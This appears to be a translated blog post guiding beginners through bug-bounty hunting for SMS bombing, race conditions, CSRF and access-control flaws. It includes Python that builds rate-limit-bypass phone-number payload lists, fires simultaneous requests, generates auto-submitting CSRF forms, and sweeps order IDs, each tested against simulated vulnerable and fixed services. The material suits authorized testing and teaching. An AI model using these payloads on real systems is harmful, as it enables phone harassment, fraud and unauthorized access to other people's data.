言心吾

言心吾's Blog

My words are the voice of my heart

How a Beginner at SRC Hunting Can Quickly Find a First Vulnerability (Part 1)

For a beginner, how to quickly submit a first valid vulnerability to an SRC (Security Response Center) and earn a bounty is a common worry. This article recommends several vulnerability types that are common and comparatively easy to exploit, and gives detailed hunting ideas and methods to help you get started. As the saying goes, "If you can't find high-risk bugs, make it up with low-risk ones."

SMS Bombing Vulnerability

What is an SMS bombing vulnerability?

An SMS bombing vulnerability (SMS flooding) is one where an attacker abuses a platform's SMS-sending interface, typically the verification-code endpoint used for registration, login or password reset, to send a large number of messages to a victim's phone number. The victim's phone is flooded with messages and may become unusable, and the vendor pays for every message sent. The root cause is a missing or bypassable rate limit on the sending endpoint.

How to exploit an SMS bombing vulnerability?

  1. Target selection: choose sites that use SMS verification codes, such as registration, login, password recovery, etc.
  2. Interface analysis: capture the requests and responses with Burp Suite and identify the API that triggers the SMS.
  3. Send tests: replay the same request several times and observe whether there is any restriction on frequency or count (a cooldown, a per-number daily cap, a per-IP cap, or a graphic captcha tied to the request).

When testing for SMS bombing, I prefer not to start with concurrency (firing many requests at once), because a burst can get the test phone number or your IP blocked before you learn anything. Try to bypass the limit first.

Bypass techniques

  1. Prepend or append junk to the phone-number parameter: spaces, 86, 086, 0086, +86, 0, 00, \r, \n or other special characters. The rate limit is often keyed on the raw parameter string, while the backend or the SMS gateway cleans the value up before sending, so each variant is "a new number" to the limiter but the same number to the gateway. For example (\r and \n are sent URL-encoded in a form body):

     phone=%20187111111
     phone=+86187111111
     phone=1871111%20
     phone=1871111\n
     phone=1871111,1871111,187        (comma-separated list)
     phone=18711&phone=187111         (HTTP parameter pollution: duplicate parameter)

  2. Modify cookies, other variables, or the response: if the client decides whether the next send is allowed based on a cookie, a counter parameter, or a flag in the server's response, change those and resend.
  3. Append a digit: 138888888889 is 12 digits, and the SMS gateway truncates it to the first 11, so 13888888888 followed by any digit still reaches the same phone and bypasses a per-number limit.
  4. Use an encoding the backend decodes, such as URL encoding, to produce further variants of the same number.

Here is a real case (the two screenshots are not reproduced here). After finding a variant that got through, write a dictionary of such variants and send the requests in batches; the test phone then received multiple verification codes.
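The following is an added example, not code from the original post. It generates the bypass dictionary for one number in the style described above, and then shows why the dictionary works by replaying it against two simulated verification-code endpoints: one whose rate limiter is keyed on the raw parameter string (every variant counts as a new number while the gateway still dials the same phone) and a hardened one that validates the number strictly and keys the limiter on the canonical form. The victim number, the gateway clean-up rules and the one-message limit are constructed for the example.

```python
import re
import urllib.parse
from collections import defaultdict

VICTIM = "18711111111"  # constructed test number, not a real subscriber

# Prefixes and suffixes from the bypass list above; space, CR and LF are
# URL-encoded because that is how they travel in a form body.
PREFIXES = ["", "%20", "0", "00", "86", "086", "0086", "%2B86"]
SUFFIXES = ["", "%20", "%0d", "%0a", "%0d%0a"]


def build_dictionary(phone):
    """Payload list for one target number, ready to paste into Intruder."""
    payloads = [p + phone + s for p in PREFIXES for s in SUFFIXES]
    payloads += [phone + d for d in "0123456789"]  # 12 digits; gateway keeps the first 11
    payloads.append(phone + "%2C" + phone)        # comma-separated list
    return list(dict.fromkeys(payloads))          # dedupe, keep order


def gateway_number(raw):
    """Lenient clean-up a typical SMS gateway applies before dialling (assumed):
    decode, keep digits only, drop leading zeros and the 86 country code, keep 11 digits."""
    digits = re.sub(r"\D", "", urllib.parse.unquote(raw)).lstrip("0")
    if len(digits) > 11 and digits.startswith("86"):
        digits = digits[2:]
    return digits[:11]


def strict_number(raw):
    """Canonical key for the hardened service: only a bare 11-digit mainland
    mobile number, optionally prefixed with 86 or +86; anything else is rejected."""
    m = re.fullmatch(r"(?:\+?86)?(1\d{10})", urllib.parse.unquote(raw))
    return m.group(1) if m else None


class SmsService:
    """Verification-code endpoint allowing `limit` sends per key.
    (A real limiter also has a time window; it is omitted here.)"""

    def __init__(self, key_func, limit=1):
        self.key_func = key_func
        self.limit = limit
        self.sent_per_key = defaultdict(int)
        self.delivered = defaultdict(int)  # phone -> messages that actually arrived

    def send_code(self, raw_phone):
        key = self.key_func(raw_phone)
        if key is None:
            return "400 invalid phone"
        if self.sent_per_key[key] >= self.limit:
            return "429 too many requests"
        self.sent_per_key[key] += 1
        self.delivered[gateway_number(raw_phone)] += 1
        return "200 sent"


def vulnerable_service():
    # Limiter keyed on the raw parameter string: every variant is a "new" number.
    return SmsService(key_func=lambda raw: raw)


def fixed_service():
    # Limiter keyed on the canonical number; malformed input never reaches the gateway.
    return SmsService(key_func=strict_number)


def run_dictionary(service, phone):
    """Replay the whole dictionary; return (messages the victim received, 200 responses)."""
    results = [service.send_code(v) for v in build_dictionary(phone)]
    return service.delivered[phone], results.count("200 sent")


if __name__ == "__main__":
    print("vulnerable:", run_dictionary(vulnerable_service(), VICTIM))  # (51, 51)
    print("fixed:     ", run_dictionary(fixed_service(), VICTIM))       # (1, 1)
```

`"\n".join(build_dictionary(number))` is the payload list to load into Intruder (or a Turbo Intruder wordlist). Against a real target, count the codes that arrive on your own test phone, not the 200 responses: some backends answer 200 and silently drop the message, and others split a comma-separated value and send one message per entry.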

Concurrency Vulnerability

What is a concurrency vulnerability?

A concurrency vulnerability (a race condition) arises when the server does not process simultaneous requests atomically. A check ("has this user already signed in today?", "does the balance cover this redemption?") and the action that follows it run as separate steps, so several requests that arrive inside that window all pass the check and the action executes more than once, leaving the data inconsistent.

How to exploit a concurrency vulnerability?

Everything can be concurrent.

Concurrency testing mainly targets actions that should happen once, or once per day: daily sign-in, points redemption, likes and comment likes. The test is whether the server honours the request more than once when many identical copies arrive at the same instant.

To raise the severity of a concurrency bug, tie it to money, or show the vendor that it can be exploited to take advantage of the system (duplicate points, duplicate redemptions). A concurrency bug with a demonstrated financial impact earns a high bounty.

Tool: the Burp Suite Turbo Intruder extension (the god of concurrency). Its race-condition mode queues many copies of a request behind a gate and releases them together, so they hit the server inside the same window. Please search the internet for detailed usage.
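The following is an added example, not code from the original post or from Turbo Intruder. It models a daily sign-in handler with a check-then-act race and fires twenty simultaneous check-ins at it, the way Turbo Intruder's gate does against a real server, then shows the same handler with the check and the credit made atomic. The service, the user name and the 10-point credit are constructed for the example.

```python
import threading
import time


class PointsService:
    """Daily check-in: each user should be credited 10 points once per day."""

    def __init__(self, window):
        self.window = window        # models the latency between the check and the credit
        self.signed_today = set()
        self.balance = {}
        self.lock = threading.Lock()

    def _credit(self, user):
        self.signed_today.add(user)
        self.balance[user] = self.balance.get(user, 0) + 10

    def checkin_vulnerable(self, user):
        # Check-then-act without atomicity: requests that arrive inside the
        # window all see "not signed in yet" and all get credited.
        if user in self.signed_today:
            return False
        self.window()
        self._credit(user)
        return True

    def checkin_fixed(self, user):
        # Check and credit under one lock. In a real service use the database:
        # a UNIQUE (user_id, day) constraint, or UPDATE ... WHERE last_checkin <> today
        # and credit only when the row count is 1.
        with self.lock:
            if user in self.signed_today:
                return False
            self.window()
            self._credit(user)
            return True


def fire_together(handler, user, n):
    """Send n identical requests at the same instant (what Turbo Intruder's gate does)
    and return how many were accepted."""
    start = threading.Barrier(n)
    accepted = []

    def worker():
        start.wait()
        if handler(user):
            accepted.append(1)

    threads = [threading.Thread(target=worker) for _ in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return len(accepted)


def race_vulnerable(n=20):
    # A barrier inside the window forces every request to finish its check
    # before any request credits: the worst-case interleaving of the race.
    svc = PointsService(window=threading.Barrier(n).wait)
    accepted = fire_together(svc.checkin_vulnerable, "alice", n)
    return accepted, svc.balance["alice"]


def race_fixed(n=20):
    # The lock serialises check+credit, so the window is just a short sleep here
    # (a barrier inside the locked section would deadlock, which is the lock doing its job).
    svc = PointsService(window=lambda: time.sleep(0.001))
    accepted = fire_together(svc.checkin_fixed, "alice", n)
    return accepted, svc.balance["alice"]


if __name__ == "__main__":
    print("vulnerable:", race_vulnerable())  # (20, 200)
    print("fixed:     ", race_fixed())       # (1, 10)
```

Against a real target the window is network and database latency rather than a barrier, so results vary from run to run; send 20 to 30 copies and repeat a few times before concluding the endpoint is safe. The evidence for the report is the account state afterwards (balance, sign-in count), not the number of 200 responses.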

CSRF (Cross-Site Request Forgery)

What is a CSRF vulnerability?

A CSRF vulnerability lets an attacker forge a request on behalf of a logged-in user: the victim opens an attacker-controlled page, the browser automatically attaches the victim's session cookie to a request that page sends to the target site, and the target executes a state-changing operation the victim never intended, without the victim's knowledge.

How to exploit a CSRF vulnerability?

  1. Find critical operations: choose state-changing actions that require the user to be logged in, such as changing the password, changing the bound e-mail or phone, or submitting a form.
  2. Check for protection: look at the captured request for an anti-CSRF token (a random parameter or a custom header) and for Referer/Origin validation; if a token is present, try removing it or reusing an old one before giving up.
  3. Construct the malicious request: build an HTML page containing a form or script that submits the same request, and induce the user to open it.
  4. Verify the vulnerability: open the page while logged in and confirm that the operation executes.
  • CSRF PoC generator in Burp Suite (right-click a request, Engagement tools, Generate CSRF PoC)
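The following is an added example, not code from the original post or from Burp. It takes a captured password-change request in the raw form Burp shows, flags the things that would stop a plain cross-site form (anti-CSRF parameters, custom headers, JSON bodies), and emits an auto-submitting form of the same shape as Burp's CSRF PoC generator. The host, path, cookie and parameter names in the captured request are constructed for the example.

```python
import html
from urllib.parse import parse_qsl

# Captured request, as Burp shows it (constructed for this example; the host,
# path and parameter names are assumptions, not a real site).
CAPTURED = (
    "POST /account/password HTTP/1.1\r\n"
    "Host: target.example\r\n"
    "Cookie: session=abc123\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "new_password=P%40ss1234&confirm=P%40ss1234"
)

TOKEN_HINTS = ("csrf", "xsrf", "token", "nonce")


def parse_request(raw):
    """Split a raw HTTP request into method, absolute URL, headers and body parameters."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    params = parse_qsl(body, keep_blank_values=True)
    return method, f"https://{headers['Host']}{path}", headers, params


def csrf_defences(headers, params):
    """List what would stop a plain HTML-form PoC: tokens, custom headers, JSON bodies."""
    found = []
    for name, _ in params:
        if any(h in name.lower() for h in TOKEN_HINTS):
            found.append(f"anti-CSRF parameter: {name}")
    for name in headers:
        if name.lower().startswith(("x-csrf", "x-xsrf", "x-requested-with")):
            found.append(f"custom header: {name} (a cross-site form cannot set it)")
    if headers.get("Content-Type", "").lower().startswith("application/json"):
        found.append("JSON body: a form can only send urlencoded, multipart or text/plain")
    return found


def build_csrf_poc(method, url, params):
    """Auto-submitting form, the same shape Burp's CSRF PoC generator emits.
    Every attribute value is HTML-escaped so a quote in a parameter cannot break the form."""
    esc = lambda s: html.escape(s, quote=True)
    inputs = "\n".join(
        f'    <input type="hidden" name="{esc(n)}" value="{esc(v)}">' for n, v in params
    )
    return (
        "<html><body>\n"
        f'  <form id="csrf" action="{esc(url)}" method="{esc(method)}">\n'
        f"{inputs}\n"
        "  </form>\n"
        '  <script>document.getElementById("csrf").submit();</script>\n'
        "</body></html>"
    )


def poc_from_capture(raw):
    """Return (defences found, PoC HTML). An empty first element means nothing in the
    request itself blocks a cross-site form, so the PoC is worth trying as-is."""
    method, url, headers, params = parse_request(raw)
    return csrf_defences(headers, params), build_csrf_poc(method, url, params)


if __name__ == "__main__":
    found, poc = poc_from_capture(CAPTURED)
    print("defences:", found or "none")
    print(poc)
```

Host the generated HTML on a different origin and open it in a browser that is logged in to the target; the bug is confirmed only if the password actually changes. One caveat the request alone cannot tell you: check the session cookie's SameSite attribute in the Set-Cookie response. With SameSite=Strict, and with Lax (which Chrome applies by default to cookies that set no attribute), a cross-site POST from a form is sent without the cookie, so the PoC fails even though the endpoint has no token.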

Privilege Escalation Vulnerability

What is a privilege escalation vulnerability?

A privilege escalation vulnerability (broken access control) is one where a user performs operations, or reads data, that they have no permission for. Vertical escalation: an ordinary user executes functions reserved for administrators or other privileged roles. Horizontal escalation: a user reaches other users' data at the same privilege level, typically by changing an ID in the request (an IDOR).

How to exploit a privilege escalation vulnerability?

  1. Analyze access control: understand the system's permission model and the differences between roles (what an ordinary user, a VIP and an administrator can each see and do), and register at least two accounts of your own to compare.
  2. Simulate a low-privileged user: with the low-privileged account, try to reach high-privileged functions or resources directly, for example by requesting admin URLs or API paths seen in the higher-privileged session.
  3. Manual and automated testing: modify parameters in the request, such as user ID, order ID and role ID, and compare the response with the one the other account receives; a matching response means the server did not check ownership or role.
  • xia_yue plugin in Burp Suite, which automates this replay-and-compare testing
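The following is an added example, not code from the original post or from the xia_yue plugin. It simulates an API with both flavours of the bug described above (an order lookup without an ownership check, and an admin export that trusts a role field sent by the client), the fixed handler that decides ownership and role from the server-side session only, and the two probes from steps 2 and 3: an ID sweep with a low-privileged session and a role-spoofing call. The users, sessions, order IDs and paths are constructed for the example.

```python
# Constructed data: two ordinary users and one admin, three orders.
SESSIONS = {
    "sess-alice": {"user": "alice", "role": "user"},
    "sess-bob":   {"user": "bob",   "role": "user"},
    "sess-admin": {"user": "root",  "role": "admin"},
}
ORDERS = {
    1001: {"owner": "alice", "item": "keyboard", "address": "alice's address"},
    1002: {"owner": "bob",   "item": "mouse",    "address": "bob's address"},
    1003: {"owner": "alice", "item": "monitor",  "address": "alice's address"},
}


def handle_vulnerable(session_id, method, path, params):
    """Two access-control bugs: no ownership check on /orders/<id> (horizontal),
    and the admin export trusts a role field sent by the client (vertical)."""
    sess = SESSIONS.get(session_id)
    if sess is None:
        return 401, None
    if method == "GET" and path.startswith("/orders/"):
        order = ORDERS.get(int(path.rsplit("/", 1)[1]))
        return (200, order) if order else (404, None)     # BUG: anyone logged in can read it
    if method == "POST" and path == "/admin/export":
        if params.get("role") == "admin":                 # BUG: role taken from the request body
            return 200, "all-users.csv"
        return 403, None
    return 404, None


def handle_fixed(session_id, method, path, params):
    """Ownership and role are decided from the server-side session only."""
    sess = SESSIONS.get(session_id)
    if sess is None:
        return 401, None
    if method == "GET" and path.startswith("/orders/"):
        order = ORDERS.get(int(path.rsplit("/", 1)[1]))
        if order is None or order["owner"] != sess["user"]:
            return 404, None                              # same answer for "missing" and "not yours"
        return 200, order
    if method == "POST" and path == "/admin/export":
        if sess["role"] != "admin":
            return 403, None
        return 200, "all-users.csv"
    return 404, None


def idor_sweep(handler, session_id, id_range):
    """Step 3: iterate the ID parameter with a low-privileged session and report every
    object returned that belongs to someone else. In a real test you know which IDs
    are yours because you created them with your own accounts."""
    me = SESSIONS[session_id]["user"]
    leaked = []
    for oid in id_range:
        status, body = handler(session_id, "GET", f"/orders/{oid}", {})
        if status == 200 and body["owner"] != me:
            leaked.append(oid)
    return leaked


def role_probe(handler, session_id):
    """Step 2: call an admin-only function as an ordinary user with the role
    parameter spoofed in the request. True means vertical escalation."""
    status, _ = handler(session_id, "POST", "/admin/export", {"role": "admin"})
    return status == 200


if __name__ == "__main__":
    print("IDOR, vulnerable:", idor_sweep(handle_vulnerable, "sess-bob", range(1000, 1010)))  # [1001, 1003]
    print("IDOR, fixed:     ", idor_sweep(handle_fixed, "sess-bob", range(1000, 1010)))       # []
    print("role spoof, vulnerable:", role_probe(handle_vulnerable, "sess-bob"))               # True
    print("role spoof, fixed:     ", role_probe(handle_fixed, "sess-bob"))                    # False
```

When sweeping a real target, keep the range small and use only IDs that belong to accounts you registered; reading one stranger's order is already proof and is the point at which to stop and report. A response diff between the two accounts (same status, same body) is the evidence the vendor wants in the ticket.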

Conclusion

By mastering the hunting techniques for common vulnerabilities such as SMS bombing, concurrency, CSRF and privilege escalation, beginners can find their first vulnerability more quickly. In real hunting, beyond the theory, you need plenty of practice and to keep summarizing your experience. I hope this article is helpful, and I wish you success on your SRC journey!
